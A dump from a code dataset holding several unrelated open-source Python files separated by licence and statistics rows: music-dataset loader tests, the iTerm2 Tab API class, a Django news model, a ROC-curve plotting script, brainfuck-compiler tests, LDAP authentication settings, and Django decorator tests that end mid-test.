def test_load_melody3():
# load a file which exists
melody_path = (
"tests/resources/mir_datasets/medleydb_melody/"
+ "melody3/MusicDelta_Beethoven_MELODY3.csv"
)
melody_data = medleydb_melody.load_melody3(melody_path)
# check types
assert type(melody_data) == annotations.MultiF0Data
assert type(melody_data.times) is np.ndarray
assert type(melody_data.frequency_list) is list
assert type(melody_data.confidence_list) is list
# check values
assert np.allclose(
melody_data.times,
np.array([0.046439909297052155, 0.052244897959183675, 0.05804989]),
)
assert melody_data.frequency_list == [
[497.01600000000002],
[965.99199999999996, 996.46799999999996, 497.10599999999999],
[990.107, 997.608, 497.138],
]
assert melody_data.confidence_list == [
[1.0],
[1.0, 1.0, 1.0],
[1.0, 1.0, 1.0],
]
def test_load_metadata():
data_home = "tests/resources/mir_datasets/medleydb_melody"
dataset = medleydb_melody.Dataset(data_home)
metadata = dataset._metadata
assert metadata["MusicDelta_Beethoven"] == {
"audio_path": "medleydb_melody/audio/MusicDelta_Beethoven_MIX.wav",
"melody1_path": "medleydb_melody/melody1/MusicDelta_Beethoven_MELODY1.csv",
"melody2_path": "medleydb_melody/melody2/MusicDelta_Beethoven_MELODY2.csv",
"melody3_path": "medleydb_melody/melody3/MusicDelta_Beethoven_MELODY3.csv",
"artist": "MusicDelta",
"title": "Beethoven",
"genre": "Classical",
"is_excerpt": True,
"is_instrumental": True,
"n_sources": 18,
}
| bsd-3-clause | -6,562,594,936,135,093,000 | 33.488889 | 87 | 0.651418 | false |
lgouger/iTerm2 | api/library/python/iterm2/iterm2/tab.py | 1 | 10947 | """Provides a class that represents an iTerm2 tab."""
import enum
import iterm2.api_pb2
import iterm2.app
import iterm2.capabilities
import iterm2.rpc
import iterm2.session
import iterm2
import json
import typing
class NavigationDirection(enum.Enum):
"""Cardinal directions."""
LEFT = "left"
RIGHT = "right"
ABOVE = "above"
BELOW = "below"
class Tab:
"""Represents a tab.
Don't create this yourself. Instead, use :class:`~iterm2.App`."""
def __init__(self, connection, tab_id, root, tmux_window_id=None, tmux_connection_id=None):
self.connection = connection
self.__tab_id = tab_id
self.__root = root
self.active_session_id = None
self.__tmux_window_id = tmux_window_id
self.__tmux_connection_id = tmux_connection_id
def __repr__(self):
return "<Tab id=%s sessions=%s>" % (self.__tab_id, self.sessions)
def update_from(self, other):
"""Copies state from another tab into this one."""
self.__root = other.root
self.active_session_id = other.active_session_id
def update_session(self, session):
"""Replaces references to a session."""
self.__root.update_session(session)
@property
def window(self) -> 'iterm2.Window':
"""Returns the containing window."""
# Note: App sets get_window on Tab when it's created.
return Tab.get_window(self)
@property
def tmux_connection_id(self):
return self.__tmux_connection_id
@property
def tab_id(self) -> str:
"""
Each tab has a globally unique identifier.
:returns: The tab's identifier, a string.
"""
return self.__tab_id
@property
def sessions(self) -> typing.List[iterm2.session.Session]:
"""
A tab contains a list of sessions, which are its split panes.
:returns: The sessions belonging to this tab, in no particular order.
"""
return self.__root.sessions
@property
def root(self) -> iterm2.session.Splitter:
"""
A tab's sessions are stored in a tree. This returns the root of that tree.
An interior node of the tree is a Splitter. That corresponds to a
collection of adjacent sessions with split pane dividers that are all
either vertical or horizontal.
Leaf nodes are Sessions.
:returns: The root of the session tree.
"""
return self.__root
@property
def current_session(self) -> typing.Union[None, iterm2.session.Session]:
"""
:returns: The active session in this tab or `None` if it could not be determined.
"""
for session in self.sessions:
if session.session_id == self.active_session_id:
return session
return None
def pretty_str(self, indent: str="") -> str:
"""
:returns: A human readable description of the tab and its sessions.
"""
session = indent + "Tab id=%s\n" % self.tab_id
session += self.__root.pretty_str(indent=indent + " ")
return session
async def async_select(self, order_window_front: bool=True) -> None:
"""Deprecated in favor of `async_activate`."""
await async_activate(order_window_front)
async def async_activate(self, order_window_front: bool=True) -> None:
"""
Selects this tab.
:param order_window_front: Whether the window this session is in should be brought to the front and given keyboard focus.
.. seealso:: Example ":ref:`function_key_tabs_example`"
"""
await iterm2.rpc.async_activate(
self.connection,
False,
True,
order_window_front,
tab_id=self.__tab_id)
async def async_select_pane_in_direction(self, direction: NavigationDirection) -> typing.Optional[str]:
"""
Activates a split pane adjacent to the currently selected pane.
Requires iTerm2 version 3.3.2.
:param direction: Specifies the direction to move. For example, LEFT will cause the pane to the left of the currently active one.
:returns: The ID of the newly selected session ID, or None if there was no session in that direction.
:throws: :class:`~iterm2.rpc.RPCException` if something goes wrong.
"""
if not iterm2.capabilities.supports_select_pane_in_direction(self.connection):
raise iterm2.capabilities.AppVersionTooOld()
invocation = iterm2.util.invocation_string(
"iterm2.select_pane_in_direction",
{ "direction": direction.value })
await iterm2.rpc.async_invoke_method(self.connection, self.tab_id, invocation, -1)
async def async_update_layout(self) -> None:
"""Adjusts the layout of the sessions in this tab.
Change the `Session.preferred_size` of any sessions you wish to adjust before calling this.
:throws: :class:`~iterm2.rpc.RPCException` if something goes wrong.
"""
response = await iterm2.rpc.async_set_tab_layout(self.connection, self.tab_id, self.__root.to_protobuf())
status = response.set_tab_layout_response.status
if status == iterm2.api_pb2.SetTabLayoutResponse.Status.Value("OK"):
return response.set_tab_layout_response
else:
raise iterm2.rpc.RPCException(iterm2.api_pb2.SetTabLayoutResponse.Status.Name(status))
@property
def tmux_window_id(self) -> typing.Union[None, str]:
"""Returns this tab's tmux window id or None.
:returns: A tmux window id or `None` if this is not a tmux integration window.
"""
return self.__tmux_window_id
async def async_set_variable(self, name: str, value: typing.Any) -> None:
"""
Sets a user-defined variable in the tab.
See the Scripting Fundamentals documentation for more information on user-defined variables.
:param name: The variable's name. Must begin with `user.`.
:param value: The new value to assign.
:throws: :class:`RPCException` if something goes wrong.
"""
result = await iterm2.rpc.async_variable(
self.connection,
sets=[(name, json.dumps(value))],
tab_id=self.__tab_id)
status = result.variable_response.status
if status != iterm2.api_pb2.VariableResponse.Status.Value("OK"):
raise iterm2.rpc.RPCException(iterm2.api_pb2.VariableResponse.Status.Name(status))
async def async_get_variable(self, name: str) -> typing.Any:
"""
Fetches a tab variable.
See Badges documentation for more information on variables.
:param name: The variable's name.
:returns: The variable's value or `None` if it is undefined.
:throws: :class:`RPCException` if something goes wrong.
.. seealso:: Example ":ref:`sorttabs_example`"
"""
result = await iterm2.rpc.async_variable(self.connection, gets=[name], tab_id=self.__tab_id)
status = result.variable_response.status
if status != iterm2.api_pb2.VariableResponse.Status.Value("OK"):
raise iterm2.rpc.RPCException(iterm2.api_pb2.VariableResponse.Status.Name(status))
else:
return json.loads(result.variable_response.values[0])
async def async_close(self, force: bool=False) -> None:
"""
Closes the tab.
:param force: If True, the user will not be prompted for a confirmation.
:throws: :class:`RPCException` if something goes wrong.
.. seealso:: Example ":ref:`close_to_the_right_example`"
"""
result = await iterm2.rpc.async_close(self.connection, tabs=[self.__tab_id], force=force)
status = result.close_response.statuses[0]
if status != iterm2.api_pb2.CloseResponse.Status.Value("OK"):
raise iterm2.rpc.RPCException(iterm2.api_pb2.CloseResponse.Status.Name(status))
async def async_set_title(self, title: str):
"""Changes the tab's title.
This is equivalent to editing the tab's title with the menu item Edit Tab Title. The title is an interpolated string.
:param title: The new title. Set it to an empty string to use the default value (the current session's title).
:throws: :class:`~iterm2.rpc.RPCException` if something goes wrong.
"""
invocation = iterm2.util.invocation_string(
"iterm2.set_title",
{ "title": title })
await iterm2.rpc.async_invoke_method(self.connection, self.tab_id, invocation, -1)
async def async_invoke_function(self, invocation: str, timeout: float=-1):
"""
Invoke an RPC. Could be a registered function by this or another script of a built-in function.
This invokes the RPC in the context of this tab. Note that most user-defined RPCs expect to be invoked in the context of a session. Default variables will be pulled from that scope. If you call a function from the wrong context it may fail because its defaults will not be set properly.
:param invocation: A function invocation string.
:param timeout: Max number of secondsto wait. Negative values mean to use the system default timeout.
:returns: The result of the invocation if successful.
:throws: :class:`~iterm2.rpc.RPCException` if something goes wrong.
"""
response = await iterm2.rpc.async_invoke_function(
self.connection,
invocation,
tab_id=self.tab_id,
timeout=timeout)
which = response.invoke_function_response.WhichOneof('disposition')
if which == 'error':
if response.invoke_function_response.error.status == iterm2.api_pb2.InvokeFunctionResponse.Status.Value("TIMEOUT"):
raise iterm2.rpc.RPCException("Timeout")
else:
raise iterm2.rpc.RPCException("{}: {}".format(
iterm2.api_pb2.InvokeFunctionResponse.Status.Name(
response.invoke_function_response.error.status),
response.invoke_function_response.error.error_reason))
return json.loads(response.invoke_function_response.success.json_result)
async def async_move_to_window(self) -> 'iterm2.window.Window':
"""
Moves this tab to its own window, provided there are multiple tabs in the window it belongs to.
:returns: The new window ID.
:throws: :class:`~iterm2.rpc.RPCException` if something goes wrong.
"""
window_id = await self.async_invoke_function("iterm2.move_tab_to_window()")
app = await iterm2.app.async_get_app(self.connection)
assert(app)
window = app.get_window_by_id(window_id)
if not window:
raise iterm2.rpc.RPCException("No such window {}".format(window_id))
return window
| gpl-2.0 | -8,314,729,409,645,964,000 | 38.377698 | 294 | 0.636065 | false |
OpenTTD-Ladder/ladder-web | ladder/frontpage/models.py | 1 | 1035 | from django.conf import settings
from django.db import models
from django.utils import timezone
from translations.models import Translatable, Translation
try:
from ckeditor.fields import RichTextField
except ImportError:
RichTextField = models.TextField
class News(Translatable):
author = models.ForeignKey(settings.AUTH_USER_MODEL, related_name = "news_authored")
authored = models.DateTimeField(default = timezone.now)
background = models.ImageField(upload_to = "images", blank = True, null = True)
class Meta:
verbose_name = "News Item"
verbose_name_plural = "News Items"
class NewsTranslation(Translation):
news = models.ForeignKey(News, related_name='translations')
title = models.CharField(max_length = 64)
intro = RichTextField()
continued = RichTextField()
def __unicode__(self):
return self.title
class Meta:
verbose_name = "Translation"
verbose_name_plural = "Translations" | gpl-2.0 | -3,211,320,791,145,666,600 | 32.419355 | 97 | 0.674396 | false |
ntamas/yard | yard/scripts/plot.py | 1 | 9037 | """Standalone command-line application that plots ROC, precision-recall
and accumulation curves."""
import sys
from itertools import cycle
from yard.data import BinaryClassifierData
from yard.curve import CurveFactory
from yard.scripts import CommandLineAppForClassifierData
from yard.utils import parse_size
__author__ = "Tamas Nepusz"
__email__ = "[email protected]"
__copyright__ = "Copyright (c) 2010, Tamas Nepusz"
__license__ = "MIT"
class ROCPlotterApplication(CommandLineAppForClassifierData):
"""\
%prog input_file
Standalone command-line application that plots ROC, precision-recall
and accumulation curves.
The input file must contain one observation per line, the first column
being the expected class (1 for positive examples, -1 for negatives),
the second being the prediction itself. You can also use the -c switch
to use different column indices and multiple datasets. Columns are
separated by whitespace per default.\
"""
short_name = "yard-plot"
def __init__(self):
super(ROCPlotterApplication, self).__init__()
def add_parser_options(self):
"""Creates the command line parser object for the application"""
super(ROCPlotterApplication, self).add_parser_options()
parser = self.parser
parser.add_option(
"-t",
"--curve-type",
dest="curve_types",
metavar="TYPE",
choices=CurveFactory.get_curve_names(),
action="append",
default=[],
help="sets the TYPE of the curve to be plotted "
"(roc, pr, ac, sespe or croc). May be specified "
"multiple times.",
)
parser.add_option(
"-l",
"--log-scale",
dest="log_scale",
metavar="AXES",
help="use logarithmic scale on the given AXES. "
"Valid values: none, x, y and xy",
choices=["none", "x", "y", "xy"],
default="none",
)
parser.add_option(
"-o",
"--output",
dest="output",
metavar="FILE",
help="saves the plot to the given FILE instead of showing it",
default=None,
)
parser.add_option(
"-s",
"--size",
dest="size",
metavar="WIDTHxHEIGHT",
help="sets the size of the figure to WIDTHxHEIGHT, where "
"WIDTH and HEIGHT are measures in inches. You may "
"specify alternative measures (cm or mm) by adding "
'them as a suffix; e.g., "6cmx4cm" or "6cm x 4cm"',
default=None,
)
parser.add_option(
"--dpi",
dest="dpi",
metavar="DPI",
type=float,
default=72.0,
help="specifies the dpi value (dots per inch) when "
"converting pixels to inches and vice versa "
"in figure and font size calculations. "
"Default: %default",
)
parser.add_option(
"--font-size",
dest="font_size",
metavar="SIZE",
type=float,
default=None,
help="overrides the font size to be used on figures, " "in points (pt).",
)
parser.add_option(
"--show-auc",
dest="show_auc",
action="store_true",
default=False,
help="shows the AUC scores in the legend",
)
parser.add_option(
"--no-resampling",
dest="resampling",
action="store_false",
default=True,
help="don't resample curves before " "plotting and AUC calculation",
)
def run_real(self):
"""Runs the main application"""
import matplotlib
# Do we need headless mode for matplotlib?
if self.options.output:
matplotlib.use("agg")
# If no curve type was given, assume a ROC curve
if not self.options.curve_types:
self.options.curve_types = ["roc"]
# Set up the font size
if self.options.font_size is not None:
for param in ["font.size", "legend.fontsize"]:
matplotlib.rcParams[param] = self.options.font_size
# Get the types of the curves to be plotted
curve_classes = []
for name in self.options.curve_types:
try:
curve_classes.append(CurveFactory.find_class_by_name(name))
except ValueError:
self.parser.error("Unknown curve type: %s" % name)
# Do we have multiple curve types? If so, we need PDF output
pp = None
if len(curve_classes) > 1:
if not self.options.output or not self.options.output.endswith(".pdf"):
self.parser.error("multiple curves can only be plotted to PDF")
try:
from matplotlib.backends.backend_pdf import PdfPages
except ImportError:
self.parser.error(
"Matplotlib is too old and does not have "
"multi-page PDF support yet. Please upgrade it to "
"Matplotlib 0.99 or later"
)
pp = PdfPages(self.options.output)
def figure_saver(figure):
pp.savefig(figure, bbox_inches="tight")
elif self.options.output:
# Figure with a single plot will be created
def figure_saver(figure):
self.log.info("Saving plot to %s..." % self.options.output)
figure.savefig(self.options.output, bbox_inches="tight")
else:
# Figure will be shown on screen
def figure_saver(figure):
import matplotlib.pyplot as plt
plt.show()
self.process_input_files()
self.log.info("Plotting results...")
for curve_class in curve_classes:
fig = self.get_figure_for_curves(curve_class)
figure_saver(fig)
# For multi-page output, we have to close it explicitly
if pp is not None:
pp.close()
def get_figure_for_curves(self, curve_class):
"""Plots curves given by `curve_class` for all the data in `self.data`.
`curve_class` is a subclass of `BinaryClassifierPerformanceCurve`.
`self.data` must be a dict of lists, and the ``__class__`` key of
`self.data` must map to the expected classes of elements. Returns an
instance of `matplotlib.figure.Figure`."""
fig, axes = None, None
data = self.data
expected = data["__class__"]
keys = sorted(data.keys())
keys.remove("__class__")
styles = [
"r-",
"b-",
"g-",
"c-",
"m-",
"y-",
"k-",
"r--",
"b--",
"g--",
"c--",
"m--",
"y--",
"k--",
]
# Plot the curves
line_handles, labels, aucs = [], [], []
for key, style in zip(keys, cycle(styles)):
self.log.info(
"Calculating %s for %s..." % (curve_class.get_friendly_name(), key)
)
observed = data[key]
bc_data = BinaryClassifierData(zip(observed, expected), title=key)
curve = curve_class(bc_data)
if self.options.resampling:
curve.resample(x / 2000.0 for x in range(2001))
if self.options.show_auc:
aucs.append(curve.auc())
labels.append("%s, AUC=%.4f" % (key, aucs[-1]))
else:
labels.append(key)
if not fig:
dpi = self.options.dpi
fig = curve.get_empty_figure(
dpi=dpi, figsize=parse_size(self.options.size, dpi=dpi)
)
axes = fig.get_axes()[0]
line_handle = curve.plot_on_axes(axes, style=style, legend=False)
line_handles.append(line_handle)
if aucs:
# Sort the labels of the legend in decreasing order of AUC
indices = sorted(range(len(aucs)), key=aucs.__getitem__, reverse=True)
line_handles = [line_handles[i] for i in indices]
labels = [labels[i] for i in indices]
aucs = [aucs[i] for i in indices]
if axes:
legend_pos = "best"
# Set logarithmic axes if needed
if "x" in self.options.log_scale:
axes.set_xscale("log")
legend_pos = "upper left"
if "y" in self.options.log_scale:
axes.set_yscale("log")
# Plot the legend
axes.legend(line_handles, labels, loc=legend_pos)
return fig
def main():
"""Entry point for the plotter script"""
sys.exit(ROCPlotterApplication().run())
if __name__ == "__main__":
main()
| mit | -2,838,634,514,883,085,300 | 31.507194 | 85 | 0.531592 | false |
vegitron/python2brainfuck | t/py2b/if_statements.py | 1 | 4029 | import unittest
from p2bf.builder import BFBuild
from p2bf.emitter import Emitter
import StringIO
from util.run_bf import run
class TestIfStatements(unittest.TestCase):
def test_if_true(self):
emit_output = StringIO.StringIO()
run_output = StringIO.StringIO()
emitter = Emitter(stdout=emit_output)
python = """if True:\n print "OK" """
builder = BFBuild(python, emit=emitter).emit_bf()
run(emit_output.getvalue(), stdout=run_output)
self.assertEqual(run_output.getvalue(), "OK\n")
def test_if_false(self):
emit_output = StringIO.StringIO()
run_output = StringIO.StringIO()
emitter = Emitter(stdout=emit_output)
python = """if False:\n print "BAD" """
builder = BFBuild(python, emit=emitter).emit_bf()
run(emit_output.getvalue(), stdout=run_output)
self.assertEqual(run_output.getvalue(), "")
def test_other_var_true(self):
emit_output = StringIO.StringIO()
run_output = StringIO.StringIO()
emitter = Emitter(stdout=emit_output)
python = """foo = 'A'\nif foo:\n print "OK" """
builder = BFBuild(python, emit=emitter).emit_bf()
run(emit_output.getvalue(), stdout=run_output)
self.assertEqual(run_output.getvalue(), "OK\n")
def test_plain_string_true(self):
emit_output = StringIO.StringIO()
run_output = StringIO.StringIO()
emitter = Emitter(stdout=emit_output)
python = """if 'A':\n print "OK" """
builder = BFBuild(python, emit=emitter).emit_bf()
run(emit_output.getvalue(), stdout=run_output)
self.assertEqual(run_output.getvalue(), "OK\n")
def test_if_else_match_if(self):
emit_output = StringIO.StringIO()
run_output = StringIO.StringIO()
emitter = Emitter(stdout=emit_output)
python = ("if 'A':\n print 'IF'\n"
"else:\n print 'ELSE'\n")
builder = BFBuild(python, emit=emitter).emit_bf()
run(emit_output.getvalue(), stdout=run_output)
self.assertEqual(run_output.getvalue(), "IF\n")
def test_if_else_match_else(self):
emit_output = StringIO.StringIO()
run_output = StringIO.StringIO()
emitter = Emitter(stdout=emit_output)
python = ("if False:\n print 'IF'\n"
"else:\n print 'ELSE'\n")
builder = BFBuild(python, emit=emitter).emit_bf()
run(emit_output.getvalue(), stdout=run_output)
self.assertEqual(run_output.getvalue(), "ELSE\n")
def test_if_elif_else_match_if(self):
emit_output = StringIO.StringIO()
run_output = StringIO.StringIO()
emitter = Emitter(stdout=emit_output)
python = ("if 'A':\n print 'IF'\n"
"elif 'B':\n print 'ELIF'\n"
"else:\n print 'ELSE'\n")
builder = BFBuild(python, emit=emitter).emit_bf()
run(emit_output.getvalue(), stdout=run_output)
self.assertEqual(run_output.getvalue(), "IF\n")
def test_if_elif_else_match_elif(self):
emit_output = StringIO.StringIO()
run_output = StringIO.StringIO()
emitter = Emitter(stdout=emit_output)
python = ("if False:\n print 'IF'\n"
"elif 'B':\n print 'ELIF'\n"
"else:\n print 'ELSE'\n")
builder = BFBuild(python, emit=emitter).emit_bf()
run(emit_output.getvalue(), stdout=run_output)
self.assertEqual(run_output.getvalue(), "ELIF\n")
def test_if_elif_else_match_else(self):
emit_output = StringIO.StringIO()
run_output = StringIO.StringIO()
emitter = Emitter(stdout=emit_output)
python = ("if False:\n print 'IF'\n"
"elif False:\n print 'ELIF 2'\n"
"else:\n print 'ELSE'")
builder = BFBuild(python, emit=emitter).emit_bf()
run(emit_output.getvalue(), stdout=run_output)
self.assertEqual(run_output.getvalue(), "ELSE\n")
| apache-2.0 | -2,884,884,697,422,707,000 | 40.96875 | 58 | 0.590966 | false |
kingsdigitallab/kdl-django | ddhldap/settings.py | 1 | 1609 | # -----------------------------------------------------------------------------
# http://pythonhosted.org/django-auth-ldap/
# -----------------------------------------------------------------------------
from django_auth_ldap.config import LDAPSearch, PosixGroupType
import ldap
LDAP_BASE_DC = 'dc=dighum,dc=kcl,dc=ac,dc=uk'
LDAP_BASE_OU = 'ou=groups,' + LDAP_BASE_DC
# Baseline configuration
AUTH_LDAP_SERVER_URI = 'ldap://ldap1.cch.kcl.ac.uk'
AUTH_LDAP_BIND_DN = ''
AUTH_LDAP_BIND_PASSWORD = ''
AUTH_LDAP_USER_DN_TEMPLATE = 'uid=%(user)s,ou=people,' + LDAP_BASE_DC
# Set up the basic group parameters
AUTH_LDAP_GROUP_SEARCH = LDAPSearch(
LDAP_BASE_OU,
ldap.SCOPE_SUBTREE,
'(objectClass=posixGroup)'
)
AUTH_LDAP_GROUP_TYPE = PosixGroupType(name_attr='cn')
# Simple group restrictions
# TODO: Set this value in the project settings
AUTH_LDAP_REQUIRE_GROUP = ''
# Populate the Django user from the LDAP directory
AUTH_LDAP_USER_ATTR_MAP = {
'first_name': 'givenName',
'last_name': 'sn',
'email': 'mail'
}
AUTH_LDAP_USER_FLAGS_BY_GROUP = {
'is_active': 'cn=confluence-users,' + LDAP_BASE_OU,
'is_staff': 'cn=kdl-staff,' + LDAP_BASE_OU,
'is_superuser': 'cn=sysadmin,' + LDAP_BASE_OU
}
AUTH_LDAP_PROFILE_FLAGS_BY_GROUP = {}
# This is the default, but I like to be explicit
AUTH_LDAP_ALWAYS_UPDATE_USER = True
# Cache group memberships for an hour to minimize LDAP traffic
AUTH_LDAP_CACHE_GROUPS = True
AUTH_LDAP_GROUP_CACHE_TIMEOUT = 60 * 60
AUTHENTICATION_BACKENDS = (
'django_auth_ldap.backend.LDAPBackend',
'django.contrib.auth.backends.ModelBackend',
)
| mit | 6,093,891,807,804,528,000 | 28.254545 | 79 | 0.632691 | false |
georgemarshall/django | tests/decorators/tests.py | 13 | 14939 | from functools import update_wrapper, wraps
from unittest import TestCase
from django.contrib.admin.views.decorators import staff_member_required
from django.contrib.auth.decorators import (
login_required, permission_required, user_passes_test,
)
from django.http import HttpRequest, HttpResponse, HttpResponseNotAllowed
from django.middleware.clickjacking import XFrameOptionsMiddleware
from django.test import SimpleTestCase
from django.utils.decorators import method_decorator
from django.utils.functional import keep_lazy, keep_lazy_text, lazy
from django.utils.safestring import mark_safe
from django.views.decorators.cache import (
cache_control, cache_page, never_cache,
)
from django.views.decorators.clickjacking import (
xframe_options_deny, xframe_options_exempt, xframe_options_sameorigin,
)
from django.views.decorators.http import (
condition, require_GET, require_http_methods, require_POST, require_safe,
)
from django.views.decorators.vary import vary_on_cookie, vary_on_headers
def fully_decorated(request):
"""Expected __doc__"""
return HttpResponse('<html><body>dummy</body></html>')
fully_decorated.anything = "Expected __dict__"
def compose(*functions):
# compose(f, g)(*args, **kwargs) == f(g(*args, **kwargs))
functions = list(reversed(functions))
def _inner(*args, **kwargs):
result = functions[0](*args, **kwargs)
for f in functions[1:]:
result = f(result)
return result
return _inner
full_decorator = compose(
# django.views.decorators.http
require_http_methods(["GET"]),
require_GET,
require_POST,
require_safe,
condition(lambda r: None, lambda r: None),
# django.views.decorators.vary
vary_on_headers('Accept-language'),
vary_on_cookie,
# django.views.decorators.cache
cache_page(60 * 15),
cache_control(private=True),
never_cache,
# django.contrib.auth.decorators
# Apply user_passes_test twice to check #9474
user_passes_test(lambda u: True),
login_required,
permission_required('change_world'),
# django.contrib.admin.views.decorators
staff_member_required,
# django.utils.functional
keep_lazy(HttpResponse),
keep_lazy_text,
lazy,
# django.utils.safestring
mark_safe,
)
fully_decorated = full_decorator(fully_decorated)
class DecoratorsTest(TestCase):
def test_attributes(self):
"""
Built-in decorators set certain attributes of the wrapped function.
"""
self.assertEqual(fully_decorated.__name__, 'fully_decorated')
self.assertEqual(fully_decorated.__doc__, 'Expected __doc__')
self.assertEqual(fully_decorated.__dict__['anything'], 'Expected __dict__')
def test_user_passes_test_composition(self):
"""
The user_passes_test decorator can be applied multiple times (#9474).
"""
def test1(user):
user.decorators_applied.append('test1')
return True
def test2(user):
user.decorators_applied.append('test2')
return True
def callback(request):
return request.user.decorators_applied
callback = user_passes_test(test1)(callback)
callback = user_passes_test(test2)(callback)
class DummyUser:
pass
class DummyRequest:
pass
request = DummyRequest()
request.user = DummyUser()
request.user.decorators_applied = []
response = callback(request)
self.assertEqual(response, ['test2', 'test1'])
def test_cache_page(self):
def my_view(request):
return "response"
my_view_cached = cache_page(123)(my_view)
self.assertEqual(my_view_cached(HttpRequest()), "response")
my_view_cached2 = cache_page(123, key_prefix="test")(my_view)
self.assertEqual(my_view_cached2(HttpRequest()), "response")
def test_require_safe_accepts_only_safe_methods(self):
"""
Test for the require_safe decorator.
A view returns either a response or an exception.
Refs #15637.
"""
def my_view(request):
return HttpResponse("OK")
my_safe_view = require_safe(my_view)
request = HttpRequest()
request.method = 'GET'
self.assertIsInstance(my_safe_view(request), HttpResponse)
request.method = 'HEAD'
self.assertIsInstance(my_safe_view(request), HttpResponse)
request.method = 'POST'
self.assertIsInstance(my_safe_view(request), HttpResponseNotAllowed)
request.method = 'PUT'
self.assertIsInstance(my_safe_view(request), HttpResponseNotAllowed)
request.method = 'DELETE'
self.assertIsInstance(my_safe_view(request), HttpResponseNotAllowed)
# For testing method_decorator, a decorator that assumes a single argument.
# We will get type arguments if there is a mismatch in the number of arguments.
def simple_dec(func):
def wrapper(arg):
return func("test:" + arg)
return wraps(func)(wrapper)
simple_dec_m = method_decorator(simple_dec)
# For testing method_decorator, two decorators that add an attribute to the function
def myattr_dec(func):
def wrapper(*args, **kwargs):
return func(*args, **kwargs)
wrapper.myattr = True
return wrapper
myattr_dec_m = method_decorator(myattr_dec)
def myattr2_dec(func):
def wrapper(*args, **kwargs):
return func(*args, **kwargs)
wrapper.myattr2 = True
return wrapper
myattr2_dec_m = method_decorator(myattr2_dec)
class ClsDec:
def __init__(self, myattr):
self.myattr = myattr
def __call__(self, f):
def wrapped():
return f() and self.myattr
return update_wrapper(wrapped, f)
class MethodDecoratorTests(SimpleTestCase):
"""
Tests for method_decorator
"""
def test_preserve_signature(self):
class Test:
@simple_dec_m
def say(self, arg):
return arg
self.assertEqual("test:hello", Test().say("hello"))
def test_preserve_attributes(self):
# Sanity check myattr_dec and myattr2_dec
@myattr_dec
def func():
pass
self.assertIs(getattr(func, 'myattr', False), True)
@myattr2_dec
def func():
pass
self.assertIs(getattr(func, 'myattr2', False), True)
@myattr_dec
@myattr2_dec
def func():
pass
self.assertIs(getattr(func, 'myattr', False), True)
self.assertIs(getattr(func, 'myattr2', False), False)
# Decorate using method_decorator() on the method.
class TestPlain:
@myattr_dec_m
@myattr2_dec_m
def method(self):
"A method"
pass
# Decorate using method_decorator() on both the class and the method.
# The decorators applied to the methods are applied before the ones
# applied to the class.
@method_decorator(myattr_dec_m, "method")
class TestMethodAndClass:
@method_decorator(myattr2_dec_m)
def method(self):
"A method"
pass
# Decorate using an iterable of function decorators.
@method_decorator((myattr_dec, myattr2_dec), 'method')
class TestFunctionIterable:
def method(self):
"A method"
pass
# Decorate using an iterable of method decorators.
decorators = (myattr_dec_m, myattr2_dec_m)
@method_decorator(decorators, "method")
class TestMethodIterable:
def method(self):
"A method"
pass
tests = (TestPlain, TestMethodAndClass, TestFunctionIterable, TestMethodIterable)
for Test in tests:
with self.subTest(Test=Test):
self.assertIs(getattr(Test().method, 'myattr', False), True)
self.assertIs(getattr(Test().method, 'myattr2', False), True)
self.assertIs(getattr(Test.method, 'myattr', False), True)
self.assertIs(getattr(Test.method, 'myattr2', False), True)
self.assertEqual(Test.method.__doc__, 'A method')
self.assertEqual(Test.method.__name__, 'method')
def test_new_attribute(self):
"""A decorator that sets a new attribute on the method."""
def decorate(func):
func.x = 1
return func
class MyClass:
@method_decorator(decorate)
def method(self):
return True
obj = MyClass()
self.assertEqual(obj.method.x, 1)
self.assertIs(obj.method(), True)
def test_bad_iterable(self):
decorators = {myattr_dec_m, myattr2_dec_m}
msg = "'set' object is not subscriptable"
with self.assertRaisesMessage(TypeError, msg):
@method_decorator(decorators, "method")
class TestIterable:
def method(self):
"A method"
pass
# Test for argumented decorator
def test_argumented(self):
class Test:
@method_decorator(ClsDec(False))
def method(self):
return True
self.assertIs(Test().method(), False)
def test_descriptors(self):
def original_dec(wrapped):
def _wrapped(arg):
return wrapped(arg)
return _wrapped
method_dec = method_decorator(original_dec)
class bound_wrapper:
def __init__(self, wrapped):
self.wrapped = wrapped
self.__name__ = wrapped.__name__
def __call__(self, arg):
return self.wrapped(arg)
def __get__(self, instance, cls=None):
return self
class descriptor_wrapper:
def __init__(self, wrapped):
self.wrapped = wrapped
self.__name__ = wrapped.__name__
def __get__(self, instance, cls=None):
return bound_wrapper(self.wrapped.__get__(instance, cls))
class Test:
@method_dec
@descriptor_wrapper
def method(self, arg):
return arg
self.assertEqual(Test().method(1), 1)
def test_class_decoration(self):
"""
@method_decorator can be used to decorate a class and its methods.
"""
def deco(func):
def _wrapper(*args, **kwargs):
return True
return _wrapper
@method_decorator(deco, name="method")
class Test:
def method(self):
return False
self.assertTrue(Test().method())
def test_tuple_of_decorators(self):
"""
@method_decorator can accept a tuple of decorators.
"""
def add_question_mark(func):
def _wrapper(*args, **kwargs):
return func(*args, **kwargs) + "?"
return _wrapper
def add_exclamation_mark(func):
def _wrapper(*args, **kwargs):
return func(*args, **kwargs) + "!"
return _wrapper
# The order should be consistent with the usual order in which
# decorators are applied, e.g.
# @add_exclamation_mark
# @add_question_mark
# def func():
# ...
decorators = (add_exclamation_mark, add_question_mark)
@method_decorator(decorators, name="method")
class TestFirst:
def method(self):
return "hello world"
class TestSecond:
@method_decorator(decorators)
def method(self):
return "hello world"
self.assertEqual(TestFirst().method(), "hello world?!")
self.assertEqual(TestSecond().method(), "hello world?!")
def test_invalid_non_callable_attribute_decoration(self):
"""
@method_decorator on a non-callable attribute raises an error.
"""
msg = (
"Cannot decorate 'prop' as it isn't a callable attribute of "
"<class 'Test'> (1)"
)
with self.assertRaisesMessage(TypeError, msg):
@method_decorator(lambda: None, name="prop")
class Test:
prop = 1
@classmethod
def __module__(cls):
return "tests"
def test_invalid_method_name_to_decorate(self):
"""
@method_decorator on a nonexistent method raises an error.
"""
msg = (
"The keyword argument `name` must be the name of a method of the "
"decorated class: <class 'Test'>. Got 'nonexistent_method' instead"
)
with self.assertRaisesMessage(ValueError, msg):
@method_decorator(lambda: None, name='nonexistent_method')
class Test:
@classmethod
def __module__(cls):
return "tests"
class XFrameOptionsDecoratorsTests(TestCase):
"""
Tests for the X-Frame-Options decorators.
"""
def test_deny_decorator(self):
"""
Ensures @xframe_options_deny properly sets the X-Frame-Options header.
"""
@xframe_options_deny
def a_view(request):
return HttpResponse()
r = a_view(HttpRequest())
